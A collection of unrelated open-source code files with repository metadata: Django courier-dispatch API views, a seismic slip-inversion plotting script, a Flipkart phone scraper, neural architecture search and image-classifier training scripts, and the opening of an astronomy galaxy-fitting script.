    move to their SHIPPING state (404 if nothing is pending).
    """
    courier = Courier.objects.get(id=request.user.id)
    #get the corresponding Dispatch object
    dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_PENDING)
    #updates the state of the pending dispatch
    dispatch.state=Dispatch.STATE_SHIPPING
    dispatch.save()
    #updates the state of the Courier
    courier.state = Courier.STATE_SHIPPING
    courier.save()
    #updates the state of the package
    dispatch.package.state=Package.STATE_SHIPPING
    dispatch.package.save()
    return HttpResponse('accepted')
@api_permission_required
def complete(request):
    """Courier reports a successful delivery (404 if they are not shipping).
    Dispatch and package -> SHIPPED; courier returns to IDLE.
    """
    courier = Courier.objects.get(id=request.user.id)
    #get the corresponding Dispatch object
    dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_SHIPPING)
    dispatch.state=Dispatch.STATE_SHIPPED
    dispatch.save()
    #updates the state of the Courier
    courier.state = Courier.STATE_IDLE
    courier.save()
    #updates the state of the package
    dispatch.package.state=Package.STATE_SHIPPED
    dispatch.package.save()
    return HttpResponse('completed')
@api_permission_required
def fail(request):
    """Courier reports a failed delivery (404 if they are not shipping).
    Dispatch and package -> FAILED; courier returns to IDLE. Note the package
    is NOT returned to the NEW pool here, unlike decline/leave.
    """
    courier = Courier.objects.get(id=request.user.id)
    #get the corresponding Dispatch object
    dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_SHIPPING)
    dispatch.state=Dispatch.STATE_FAILED
    dispatch.save()
    #updates the state of the Courier
    courier.state = Courier.STATE_IDLE
    courier.save()
    #updates the state of the package
    dispatch.package.state=Package.STATE_FAILED
    dispatch.package.save()
    return HttpResponse('failed')
@csrf_exempt
@api_permission_required
def loc_update(request):
    """POST {lat, lng}: record the courier's current position.
    Timestamps the update and mirrors it to the 'location_logger' logger.
    Returns 400 on non-POST or missing coordinates.
    """
    if request.method != 'POST':
        return HttpResponseBadRequest("post required")
    # Original used .get('lat' or None) -- equivalent to .get('lat'); fixed.
    lat = request.POST.get('lat')
    lng = request.POST.get('lng')
    if not (lat and lng):
        return HttpResponseBadRequest("invalid or missing parameters")
    courier = Courier.objects.get(id=request.user.id)
    courier.lat = lat
    courier.lng = lng
    courier.last_pos_update = datetime.now()
    courier.save()
    logger = logging.getLogger('location_logger')
    logger.info("%s: %s, %s @ %s" % (courier,lat,lng,courier.last_pos_update.isoformat()))
    return HttpResponse('location updated')
@csrf_exempt
@api_permission_required
def c2dmkey_update(request):
    """POST {registration_id}: store the courier's C2DM push registration key.
    Returns 400 on non-POST or missing key; logs to 'c2dm_logger'.
    """
    if request.method != 'POST':
        return HttpResponseBadRequest("post required")
    registration_id = request.POST.get('registration_id')
    if not registration_id:
        return HttpResponseBadRequest("invalid or missing parameters")
    courier = Courier.objects.get(id=request.user.id)
    courier.c2dmkey = registration_id
    courier.save()
    logger = logging.getLogger('c2dm_logger')
    logger.info("%s: %s @ %s" % (courier,registration_id,datetime.now()))
    return HttpResponse('c2dm key updated')
| lepilepi/eturtle | server/api/views.py | views.py | py | 5,950 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "django.http.HttpResponseBadRequest",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponseBadRequest",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.authenticate",
"line_number": 24,
"usage_type":... |
39056592319 | from numpy import array,zeros
from matplotlib import pyplot as plt
# Parse variance-reduction (VR) percentages out of slip-inversion log files,
# one per tested rupture velocity, and plot VR vs vr for each data type.
num='0016'
path='/Users/dmelgar/Slip_inv/Amatrice_3Dfitsgeol_final1/output/inverse_models/models/_previous/'
root1='bigkahuna_vrtest3win_vr'
root2='.'+num+'.log'
vr=array([1.6,1.8,2.0,2.2,2.4,2.6])  # rupture velocities swept (km/s)
vr_static=zeros(len(vr))
vr_insar=zeros(len(vr))
vr_velocity=zeros(len(vr))
for k in range(len(vr)):
    f=open(path+root1+str(vr[k])+root2,'r')
    # Scan the log line-by-line; the loop only exits on the 'VR InSAR' line,
    # so a log missing that line would spin forever -- TODO confirm format.
    while True:
        line=f.readline()
        if 'VR static' in line:
            vr_static[k]=float(line.split('=')[-1])
        elif 'VR velocity' in line:
            vr_velocity[k]=float(line.split('=')[-1])
        elif 'VR InSAR' in line:
            vr_insar[k]=float(line.split('=')[-1])
            break
    f.close()
plt.figure()
# NOTE(review): constant offsets (+19/+44/+14) are applied before plotting;
# purpose not shown here -- presumably display normalization, confirm.
plt.plot(vr,vr_static+19)
plt.plot(vr,vr_velocity+44)
plt.plot(vr,vr_insar+14)
plt.legend(['GPS','SM','InSAR'],loc=3)
plt.xlabel('vr (km/s)')
plt.ylabel('VR (%)')
plt.show() | Ogweno/mylife | amatrice/plot_vr_test.py | plot_vr_test.py | py | 935 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 1... |
73818234985 | import requests
from bs4 import BeautifulSoup
from database import DataBase
from log import log
from scrape import Scrape
class Flipkart(Scrape):
    """Scraper for smartphone listings on flipkart.com, built on the Scrape base.
    NOTE(review): relies on attributes initialized by ``Scrape``
    (``self.soup``, ``self.page``, ``self.url2``, ``self.headers``,
    ``self.listPhone``, ``self.phoneinfo``) -- confirm against the base class.
    """
    def formatData(self, soupText):
        """
        Extract (phone name, price, RAM) from one product card.
        Args:
            soupText (bs4.BeautifulSoup): one product-card tag (as produced by
                find_all in ``scrape``), searched by Flipkart CSS class names.
        Returns:
            tuple: in order:
                - phone (str or None): the phone name, or None if not found.
                - price (str or int): price digits with ',' and currency sign
                  stripped, or 0 if no price element was found.
                - ramD (str or int): RAM figure with 'GB'/'MB'/'RAM'/spaces
                  stripped, or 0 if no RAM spec line was found.
        """
        phone = soupText.find("div", class_="_4rR01T")
        price = soupText.find("div", class_="_30jeq3 _1_WHN1")
        ram = soupText.find_all("li", class_="rgWa7D")
        ramD = 0
        # formatting the phone and price variable and extracting the Ram value
        if price is not None:
            price = price.text
            price = price.replace(",", "")
            price = price.replace("₹", "")
        if price is None:
            price = 0
        if phone is not None:
            phone = phone.text
        # formatting the Ram value
        for oneRam in ram:
            if "RAM" in oneRam.text:
                ramList = oneRam.text.split("|")
                for one in ramList:
                    if "RAM" in one:
                        ramD = one
                ramD = ramD.replace("GB", "")
                ramD = ramD.replace("RAM", "")
                ramD = ramD.replace(" ", "")
                ramD = ramD.replace("MB", "")
        return phone, price, ramD
    def scrape(self, hostname):
        """
        Scrape smartphone listings from flipkart.com page by page and store
        each new phone in ``self.phoneinfo``.
        Args:
            self: The instance of the class that the function is being called on.
                This argument provides access to the attributes and methods of
                the class.
            hostname: The Database host name (used to fetch the starting _id).
        Returns:
            None -- results accumulate in ``self.phoneinfo``.
        """
        self.item = DataBase(hostname).getIndex()
        # '_1LKTO3' is the next/prev pagination anchor: loop while one exists.
        while self.soup.find('a', class_='_1LKTO3'):
            log.info("Scrapping flipkart.com website, page no. :" + str(self.page))
            url = self.url2 + str(self.page)
            req = requests.get(url, headers=self.headers)
            self.soup = BeautifulSoup(req.content, 'html.parser')
            box = self.soup.find_all("div", class_="_2kHMtA")
            for onePhone in box:
                data = self.formatData(onePhone)
                if data not in self.listPhone:  # de-duplicate across pages
                    self.item += 1
                    self.listPhone.append(data)
                    info = {
                        "_id": self.item,
                        "name": data[0],
                        # NOTE(review): int(data[2]) will raise on RAM strings
                        # that are not plain digits -- TODO confirm inputs.
                        "price": float(data[1]),
                        "ram": int(data[2])
                    }
                    self.phoneinfo.append(info)
            self.page += 1
        log.info("Scrapping Completed for flipkart.com")
| ujitkumar1/ramranger | src/flipkart_scrape.py | flipkart_scrape.py | py | 3,338 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrape.Scrape",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "database.DataBase",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "log.log.info",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "log.log",
"line_numbe... |
22372717524 | import os
import sys
import time
import glob
import numpy as np
import torch
import utils
import logging
import argparse
import torch.nn as nn
import torch.utils
import torch.nn.functional as F
import torchvision.datasets as dset
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from model_search_lfm import Network, Network_w
from architect_lfm import Architect
from encoder_resnet import *
from types import SimpleNamespace
from torch.utils.tensorboard import SummaryWriter
# Command-line configuration for the LFM architecture search run.
parser = argparse.ArgumentParser("cifar")
parser.add_argument('--data', type=str, default='../data',
                    help='location of the data corpus')
parser.add_argument('--batch_size', type=int, default=32, help='batch size')
parser.add_argument('--learning_rate_min', type=float,
                    default=0.00025, help='minimum learning rate')
parser.add_argument('--report_freq', type=float,
                    default=1, help='report frequency')
parser.add_argument('--gpu', type=str, default='0', help='gpu device id')
parser.add_argument('--epochs', type=int, default=50,
                    help='num of training epochs')
parser.add_argument('--init_channels', type=int,
                    default=16, help='num of init channels')
parser.add_argument('--layers', type=int, default=8,
                    help='total number of layers')
parser.add_argument('--model_path', type=str,
                    default='saved_models', help='path to save the model')
parser.add_argument('--cutout', action='store_true',
                    default=False, help='use cutout')
parser.add_argument('--cutout_length', type=int,
                    default=16, help='cutout length')
parser.add_argument('--drop_path_prob', type=float,
                    default=0.3, help='drop path probability')
parser.add_argument('--save', type=str, default='EXP', help='experiment name')
parser.add_argument('--seed', type=int, default=2, help='random seed')
parser.add_argument('--train_portion', type=float,
                    default=0.5, help='portion of training data')
parser.add_argument('--unrolled', action='store_true',
                    default=False, help='use one-step unrolled validation loss')
# new hyperparams.
# Per-parameter-group optimizer settings: w1/w2 (network weights),
# A (architecture), V (encoder), r (sample-weight vector).
parser.add_argument('--learning_rate_w1', type=float, default=1e-2)
parser.add_argument('--learning_rate_w2', type=float, default=1e-2)
parser.add_argument('--learning_rate_A', type=float, default=1e-3)
parser.add_argument('--learning_rate_V', type=float, default=1e-2)
parser.add_argument('--learning_rate_r', type=float, default=1e-2)
parser.add_argument('--momentum_w1', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_w2', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_A', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_V', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_r', type=float, default=0.9, help='momentum')
parser.add_argument('--weight_decay_w1', type=float, default=1e-4)
parser.add_argument('--weight_decay_w2', type=float, default=1e-4)
parser.add_argument('--weight_decay_A', type=float, default=1e-5)
parser.add_argument('--weight_decay_V', type=float, default=1e-4)
parser.add_argument('--weight_decay_r', type=float, default=1e-4)
parser.add_argument('--grad_clip_w1', type=float, default=5)
parser.add_argument('--grad_clip_w2', type=float, default=5)
parser.add_argument('--grad_clip_A', type=float, default=5)
parser.add_argument('--grad_clip_V', type=float, default=5)
parser.add_argument('--grad_clip_r', type=float, default=5)
parser.add_argument('--is_parallel', type=int, default=0)
parser.add_argument('--encoder_size', type=str, default='18')
parser.add_argument('--is_cifar100', type=int, default=0)
parser.add_argument('--resume', type=str, default='')
args = parser.parse_args()
# Timestamped experiment directory name, e.g. search-EXP-20240101-120000
args.save = 'search-{}-{}'.format(args.save, time.strftime("%Y%m%d-%H%M%S"))
writer = SummaryWriter(filename_suffix=time.strftime("%Y%m%d-%H%M%S"))
CIFAR_CLASSES = 10
CIFAR100_CLASSES = 100
def save_checkpoint(state, checkpoint=args.save, filename='checkpoint.pth.tar'):
    """Serialize *state* to ``<checkpoint>/<filename>`` with ``torch.save``."""
    torch.save(state, os.path.join(checkpoint, filename))
def main():
    """Run the LFM differentiable architecture search.
    Builds the two-copy search network (w1/w2 + architecture A), the resnet
    encoder (V) and the sample-weight vector (r), one optimizer+cosine
    scheduler per group, then alternates Architect updates / validation per
    epoch while checkpointing everything needed to --resume.
    """
    if not torch.cuda.is_available():
        logging.info('no gpu device available')
        sys.exit(1)
    np.random.seed(args.seed)
    if not args.is_parallel:
        torch.cuda.set_device(int(args.gpu))
        logging.info('gpu device = %d' % int(args.gpu))
    else:
        logging.info('gpu device = %s' % args.gpu)
    cudnn.benchmark = True
    torch.manual_seed(args.seed)
    cudnn.enabled = True
    torch.cuda.manual_seed(args.seed)
    logging.info("args = %s", args)
    criterion = nn.CrossEntropyLoss()
    criterion = criterion.cuda()
    # model contains w1, w2 and A
    if args.is_cifar100:
        model = Network(args.init_channels, CIFAR100_CLASSES, args.layers, criterion, args.is_parallel, args.gpu)
    else:
        model = Network(args.init_channels, CIFAR_CLASSES, args.layers, criterion, args.is_parallel, args.gpu)
    torch.save(model.w_temp, os.path.join(args.save, 'w_temp.pt'))
    # encoder contains V
    if args.encoder_size == '18':
        encoder = resnet18(pretrained=True).cuda()
    elif args.encoder_size == '34':
        encoder = resnet34(pretrained=True).cuda()
    elif args.encoder_size == '50':
        encoder = resnet50(pretrained=True).cuda()
    elif args.encoder_size == '101':
        encoder = resnet101(pretrained=True).cuda()
    else:
        # FIX: previously fell through and crashed later with NameError.
        raise ValueError('unsupported --encoder_size: {}'.format(args.encoder_size))
    # contains r
    # TODO: check input size
    r_vec = nn.Sequential(nn.Linear(args.batch_size, 1, bias=False)).cuda()
    # initialize r near uniform weighting with small noise
    r_vec[0].weight = nn.Parameter(torch.ones_like(r_vec[0].weight) + 1e-3*torch.randn_like(r_vec[0].weight))
    if args.is_parallel:
        args.gpu = '0,1'
        gpus = [int(i) for i in args.gpu.split(',')]
        encoder = nn.parallel.DataParallel(
            encoder, device_ids=gpus, output_device=gpus[1])
        model.w1 = nn.parallel.DataParallel(
            model.w1, device_ids=gpus, output_device=gpus[1])
        model.w2 = nn.parallel.DataParallel(
            model.w2, device_ids=gpus, output_device=gpus[1])
        encoder = encoder.module
        model.w1 = model.w1.module
        model.w2 = model.w2.module
    # logging.info("param size = %fMB", utils.count_parameters_in_MB(model))
    # One optimizer per parameter group: SGD for network weights, Adam for
    # architecture / encoder / sample-weight parameters.
    optimizers = SimpleNamespace(
        w1=torch.optim.SGD(
            model.w1.parameters(),
            args.learning_rate_w1,
            momentum=args.momentum_w1,
            weight_decay=args.weight_decay_w1),
        w2=torch.optim.SGD(
            model.w2.parameters(),
            args.learning_rate_w2,
            momentum=args.momentum_w2,
            weight_decay=args.weight_decay_w2),
        A=torch.optim.Adam(
            model.arch_parameters(),
            lr=args.learning_rate_A, betas=(0.5, 0.999),
            weight_decay=args.weight_decay_A),
        V=torch.optim.Adam(
            encoder.parameters(),
            lr=args.learning_rate_V, betas=(0.5, 0.999),
            weight_decay=args.weight_decay_V),
        r=torch.optim.Adam(
            r_vec.parameters(),
            lr=args.learning_rate_r, betas=(0.5, 0.999),
            weight_decay=args.weight_decay_r)
    )
    lr = SimpleNamespace(
        w1=args.learning_rate_w1,
        w2=args.learning_rate_w2,
        A=args.learning_rate_A,
        V=args.learning_rate_V,
        r=args.learning_rate_r
    )
    if args.is_cifar100:
        train_transform, valid_transform = utils._data_transforms_cifar100(args)
    else:
        train_transform, valid_transform = utils._data_transforms_cifar10(args)
    if args.is_cifar100:
        train_data = dset.CIFAR100(root=args.data, train=True,
                                   download=True, transform=train_transform)
    else:
        train_data = dset.CIFAR10(root=args.data, train=True,
                                  download=True, transform=train_transform)
    # Split the training set into search-train / search-valid halves.
    num_train = len(train_data)
    indices = list(range(num_train))
    split = int(np.floor(args.train_portion * num_train))
    train_queue = torch.utils.data.DataLoader(
        train_data, batch_size=args.batch_size,
        sampler=torch.utils.data.sampler.SubsetRandomSampler(indices[:split]),
        pin_memory=False, num_workers=4, drop_last=True)
    valid_queue = torch.utils.data.DataLoader(
        train_data, batch_size=args.batch_size,
        sampler=torch.utils.data.sampler.SubsetRandomSampler(indices[split:num_train]),
        pin_memory=False, num_workers=4, drop_last=True)
    schedulers = SimpleNamespace(
        w1=torch.optim.lr_scheduler.CosineAnnealingLR(
            optimizers.w1, float(args.epochs), eta_min=args.learning_rate_min),
        w2=torch.optim.lr_scheduler.CosineAnnealingLR(
            optimizers.w2, float(args.epochs), eta_min=args.learning_rate_min),
        A=torch.optim.lr_scheduler.CosineAnnealingLR(
            optimizers.A, float(args.epochs), eta_min=args.learning_rate_min),
        V=torch.optim.lr_scheduler.CosineAnnealingLR(
            optimizers.V, float(args.epochs), eta_min=args.learning_rate_min),
        r=torch.optim.lr_scheduler.CosineAnnealingLR(
            optimizers.r, float(args.epochs), eta_min=args.learning_rate_min)
    )
    architect = Architect(model, encoder, r_vec, args, optimizers, lr)
    start_epoch = 0
    if args.resume:
        checkpoint = torch.load(os.path.join(args.resume, 'checkpoint.pth.tar'))
        start_epoch = checkpoint['epoch']
        optimizers.w1.load_state_dict(checkpoint['optimizer-w1'])
        optimizers.w2.load_state_dict(checkpoint['optimizer-w2'])
        optimizers.A.load_state_dict(checkpoint['optimizer-A'])
        optimizers.V.load_state_dict(checkpoint['optimizer-V'])
        optimizers.r.load_state_dict(checkpoint['optimizer-r'])
        schedulers.w1.load_state_dict(checkpoint['scheduler-w1'])
        schedulers.w2.load_state_dict(checkpoint['scheduler-w2'])
        schedulers.A.load_state_dict(checkpoint['scheduler-A'])
        schedulers.V.load_state_dict(checkpoint['scheduler-V'])
        schedulers.r.load_state_dict(checkpoint['scheduler-r'])
        model = torch.load(os.path.join(args.resume, 'weights_model.pt')).cuda()
        encoder = torch.load(os.path.join(args.resume, 'weights_encoder.pt')).cuda()
        r_vec = torch.load(os.path.join(args.resume, 'weights_r.pt')).cuda()
    for epoch in range(start_epoch, args.epochs):
        for i in schedulers.__dict__:
            lr.__dict__[i] = schedulers.__dict__[i].get_last_lr()[0]
        logging.info('epoch %d lr_w1 %f lr_w2 %f lr_A %f lr_V %f lr_r %f', epoch, lr.w1, lr.w2, lr.A, lr.V, lr.r)
        genotype = model.genotype()
        logging.info('genotype = %s', genotype)
        # TODO: log genotypes to a folder and use some good file format -> make it usable with visualize
        print(F.softmax(model.alphas_normal, dim=-1))
        print(F.softmax(model.alphas_reduce, dim=-1))
        # training
        train_acc, train_obj = train(
            train_queue, valid_queue, model,
            architect, criterion, optimizers, lr)
        logging.info('train_acc %f', train_acc)
        logging.info('train_loss %f', train_obj)
        for i in schedulers.__dict__:
            schedulers.__dict__[i].step()
        # validation
        valid_acc, valid_obj = infer(valid_queue, model, architect, criterion)
        logging.info('valid_acc %f', valid_acc)
        logging.info('valid_loss %f', valid_obj)
        # save for the re-training
        torch.save(model, os.path.join(args.save, 'weights_model.pt'))
        torch.save(encoder, os.path.join(args.save, 'weights_encoder.pt'))
        torch.save(r_vec, os.path.join(args.save, 'weights_r.pt'))
        save_checkpoint({
            'epoch': epoch + 1,
            # FIX: key was 'scheduler_w1' (underscore) while the resume path
            # above reads 'scheduler-w1' -- every --resume raised KeyError.
            'scheduler-w1': schedulers.w1.state_dict(),
            'scheduler-w2': schedulers.w2.state_dict(),
            'scheduler-A': schedulers.A.state_dict(),
            'scheduler-V': schedulers.V.state_dict(),
            'scheduler-r': schedulers.r.state_dict(),
            'optimizer-w1': optimizers.w1.state_dict(),
            'optimizer-w2': optimizers.w2.state_dict(),
            'optimizer-A': optimizers.A.state_dict(),
            'optimizer-V': optimizers.V.state_dict(),
            'optimizer-r': optimizers.r.state_dict(),
        })
    writer.close()
def train(train_queue, valid_queue,
          model, architect, criterion, optimizers, lr):
    """One epoch of architecture search.
    For each train batch, pair it with a random valid batch and let
    ``architect.step`` perform all parameter-group updates; then log the
    training metrics of the w2 copy. Returns (top1_avg, loss_avg).
    """
    objs = utils.AvgrageMeter()
    top1 = utils.AvgrageMeter()
    top5 = utils.AvgrageMeter()
    g_step = 0
    # for step, ((input, target), (input_val, target_val)) in enumerate(zip(train_queue, valid_queue)):
    for step, (input, target) in enumerate(train_queue):
        model.train()
        architect.encoder.train()
        n = input.size(0)
        input = input.cuda()
        target = target.cuda(non_blocking=True)
        # get a random minibatch from the search queue with replacement
        input_val, target_val = next(iter(valid_queue))
        input_val = input_val.cuda()
        target_val = target_val.cuda(non_blocking=True)
        ###Architect.step will perform W1, W2, V, r, and A updates.
        ###because equations are all linked, its better to have their updates in a single place
        ### be careful of leaking gradients!!
        architect.step(input, target, input_val, target_val, unrolled=args.unrolled, save_dir=args.save)
        # TODO: think on using w1, w2, or average results
        logits = model.forward(input, 'w2')  # metrics reported on the w2 copy only
        loss = criterion(logits, target)
        prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))
        objs.update(loss.item(), n)
        top1.update(prec1.item(), n)
        top5.update(prec5.item(), n)
        writer.add_scalar("train_loss", objs.avg, g_step)
        writer.add_scalar("train_top1", top1.avg, g_step)
        writer.add_scalar("train_top5", top5.avg, g_step)
        if step % args.report_freq == 0:
            logging.info('train (on w2) %03d %e %f %f', g_step, objs.avg, top1.avg, top5.avg)
        g_step += 1
    return top1.avg, objs.avg
def infer(valid_queue, model, architect, criterion):
    """Evaluate the w2 copy on the validation queue (no gradients).
    Returns (top1_avg, loss_avg); per-step metrics go to TensorBoard.
    """
    objs = utils.AvgrageMeter()
    top1 = utils.AvgrageMeter()
    top5 = utils.AvgrageMeter()
    model.eval()
    architect.encoder.eval()
    g_step = 0
    with torch.no_grad():
        for step, (input, target) in enumerate(valid_queue):
            input = input.cuda()
            target = target.cuda(non_blocking=True)
            # TODO: w1 or w2 or average the two
            logits = model.forward(input, 'w2')
            loss = criterion(logits, target)
            prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))
            n = input.size(0)
            objs.update(loss.item(), n)
            top1.update(prec1.item(), n)
            top5.update(prec5.item(), n)
            writer.add_scalar("val_top5", top5.avg, g_step)
            writer.add_scalar("val_loss", objs.avg, g_step)
            writer.add_scalar("val_top1", top1.avg, g_step)
            if step % args.report_freq == 0:
                logging.info('valid %03d %e %f %f', g_step, objs.avg, top1.avg, top5.avg)
            g_step += 1
    return top1.avg, objs.avg
if __name__ == '__main__':
    # Create the experiment dir (with a snapshot of all .py scripts) and wire
    # logging to both stdout and <save>/log.txt before starting the search.
    utils.create_exp_dir(args.save, scripts_to_save=glob.glob('*.py'))
    log_format = '%(asctime)s %(message)s'
    logging.basicConfig(stream=sys.stdout, level=logging.INFO,
                        format=log_format, datefmt='%m/%d %I:%M:%S %p')
    fh = logging.FileHandler(os.path.join(args.save, 'log.txt'))
    fh.setFormatter(logging.Formatter(log_format))
    logging.getLogger().addHandler(fh)
    main()
| importZL/LFM | NAS/darts-lfm/train_search_lfm.py | train_search_lfm.py | py | 15,995 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "time.strftime",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 81,
"usage_type": "call"
},
{
"api_n... |
2026891662 | import argparse
import torch
from torch.autograd import Variable
from network_prep import create_loaders, prep_model, create_classifier
def get_input_args():
    """Parse command-line arguments for training.
    Positional: data_dir. Options cover checkpoint dir, architecture,
    hyper-parameters and a --gpu flag. Returns the argparse Namespace.
    """
    cli = argparse.ArgumentParser(description='Get NN arguments')
    cli.add_argument('data_dir', type=str, help='mandatory data directory')
    # (flags, keyword arguments) for every optional switch, added in a loop
    optional_specs = [
        ('--save_dir', dict(default='', help='Directory to save checkpoint.')),
        ('--arch', dict(default='vgg', help='default architecture, options: vgg, densenet, resnet')),
        ('--learning_rate', dict(default=0.001, type=float, help='default learning rate')),
        ('--hidden_units', dict(default='512', type=str, help='default hidden layer sizes')),
        ('--output_size', dict(default=102, type=int, help='default hidden output_size')),
        ('--epochs', dict(default=3, type=int, help='default training epochs')),
        ('--gpu', dict(default=False, action='store_true', help='use GPU processing')),
    ]
    for flag, keywords in optional_specs:
        cli.add_argument(flag, **keywords)
    return cli.parse_args()
def train_classifier(model, trainloader, validloader, criterion, optimizer, epochs, gpu):
    """Train *model* on trainloader, reporting validation metrics periodically.
    Every ``print_every`` steps the running training loss plus validation
    loss/accuracy are printed. Returns the trained model.
    NOTE(review): accuracy math assumes the model outputs log-probabilities
    (``torch.exp(out)`` recovers probabilities) -- confirm against the
    classifier built in network_prep.
    """
    steps = 0
    print_every = 40  # report/validate cadence, in training batches
    run_loss = 0
    if gpu and torch.cuda.is_available():
        print('GPU TRAINING')
        model.cuda()
    elif gpu and torch.cuda.is_available() == False:
        print('GPU processing selected but no NVIDIA drivers found... Training under cpu')
    else:
        print('CPU TRAINING')
    for e in range(epochs):
        model.train()
        for images, labels in iter(trainloader):
            steps += 1
            images, labels = Variable(images), Variable(labels)
            if gpu and torch.cuda.is_available():
                images, labels = images.cuda(), labels.cuda()
            optimizer.zero_grad()
            out = model.forward(images)
            loss = criterion(out, labels)
            loss.backward()
            optimizer.step()
            run_loss += loss.data.item()
            if steps % print_every == 0:
                model.eval()  # switch off dropout/batchnorm updates for validation
                acc = 0
                valid_loss = 0
                for images, labels in iter(validloader):
                    images, labels = Variable(images), Variable(labels)
                    if gpu and torch.cuda.is_available():
                        images, labels = images.cuda(), labels.cuda()
                    with torch.no_grad():
                        out = model.forward(images)
                        valid_loss += criterion(out, labels).data.item()
                        ps = torch.exp(out).data
                        equality = (labels.data == ps.max(1)[1])
                        acc += equality.type_as(torch.FloatTensor()).mean()
                print("Epoch: {}/{}.. ".format(e+1, epochs),
                      "Training Loss: {:.3f}..".format(run_loss/print_every),
                      "Valid Loss: {:.3f}..".format(valid_loss/len(validloader)),
                      "Valid Accuracy: {:.3f}".format(acc/len(validloader)))
                run_loss = 0
                model.train()  # back to training mode after validating
    print('{} EPOCHS COMPLETE. MODEL TRAINED.'.format(epochs))
    return model
def test_classifier(model, testloader, criterion, gpu):
    """Evaluate *model* on the test set and print average loss and accuracy.
    NOTE(review): like train_classifier, assumes log-probability outputs
    (``torch.exp(out)``) -- confirm.
    """
    if gpu and torch.cuda.is_available():
        print('GPU TESTING')
        model.cuda()
    elif gpu and torch.cuda.is_available() == False:
        print('CPU processing selected but no NVIDIA drivers found... testing under cpu')
    else:
        print('CPU TESTING')
    model.eval()
    acc = 0
    test_loss = 0
    for images, labels in iter(testloader):
        images, labels = Variable(images), Variable(labels)
        if gpu and torch.cuda.is_available():
            images, labels = images.cuda(), labels.cuda()
        with torch.no_grad():
            out = model.forward(images)
            test_loss += criterion(out, labels).data.item()
            ps = torch.exp(out).data
            equality = (labels.data == ps.max(1)[1])  # predicted class == label
            acc += equality.type_as(torch.FloatTensor()).mean()
    print("Test Loss: {:.3f}..".format(test_loss/len(testloader)),
          "Test Accuracy: {:.3f}".format(acc/len(testloader)))
    pass
def save_model_checkpoint(model, input_size, epochs, save_dir, arch, learning_rate, class_idx, optimizer, output_size):
    """Bundle the trained model with its training metadata and write it to disk.
    The checkpoint dict carries everything needed to rebuild the model for
    inference (classifier module + state_dict, class-to-index map, optimizer
    state, and the training hyper-parameters). Saved as
    ``<save_dir>/checkpoint.pth`` (or ``checkpoint.pth`` in the CWD when
    *save_dir* is empty, matching the previous behavior).
    """
    import os  # local import keeps this fix self-contained in the block
    saved_model = {
        'input_size':input_size,
        'epochs':epochs,
        'arch':arch,
        # sizes of every Linear layer in the classifier (ReLU/Dropout layers
        # have no out_features and are skipped)
        'hidden_units':[each.out_features for each in model.classifier if hasattr(each, 'out_features') == True],
        'output_size':output_size,
        'learning_rate':learning_rate,
        'class_to_idx':class_idx,
        'optimizer_dict':optimizer.state_dict(),
        'classifier':model.classifier,
        'state_dict':model.state_dict()
    }
    # os.path.join replaces the manual '' / '/' concatenation: identical for
    # the empty-string case and robust to a trailing slash in save_dir.
    save_path = os.path.join(save_dir, 'checkpoint.pth')
    torch.save(saved_model, save_path)
    print('Model saved at {}'.format(save_path))
def main():
in_args = get_input_args()
trainloader, testloader, validloader, class_idx = create_loaders(in_args.data_dir)
model, input_size = prep_model(in_args.arch)
model, criterion, optimizer = create_classifier(model, input_size, in_args.hidden_units, in_args.output_size, in_args.learning_rate)
trained_model = train_classifier(model, trainloader, validloader, criterion, optimizer, in_args.epochs, in_args.gpu)
test_classifier(trained_model, testloader, criterion, in_args.gpu)
save_model_checkpoint(trained_model, input_size, in_args.epochs, in_args.save_dir, in_args.arch, in_args.learning_rate, class_idx, optimizer, in_args.output_size)
pass
if __name__ == '__main__':
main()
| hikaruendo/udacity | ai programming with python1/train.py | train.py | py | 6,086 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "torch.... |
24205678140 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 26 13:21:56 2019
@author: nilose
"""
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import random
from scipy import stats
import scipy.integrate as integrate
def gauss(x,mu,sigma):
return (1/(np.sqrt(2*np.pi)*sigma))*np.exp(-0.5*((x-mu)**2)/(sigma**2))
def bigauss(x,mu,sigma, mu2, sigma2):
return gauss(x,mu,sigma)*gauss(x,mu2,sigma2)
def KDE_RSfit(dt_g,dt_cl,outname):
xdata = dt_cl
gals = dt_g
#referencia = 'A85clean-3,7-4r500.csv'
r200 = (xdata['R500(arcmin)']/ 60.0 / 0.65)
rmin = 13.0
rmax = 23.0
grmin = -1.0
grmax = 4.0
z = xdata['Redshift']
ra0 = xdata['RA']
dec0 = xdata['DEC']
rFin = 4.0*r200
rFout = 5.0*r200
rr=40
if rr == 1:
rFin = 3.5*r200
rFout = 3.8*r200
if rr == 8:
rFin = 1.3*r200
rFout = 1.49*r200
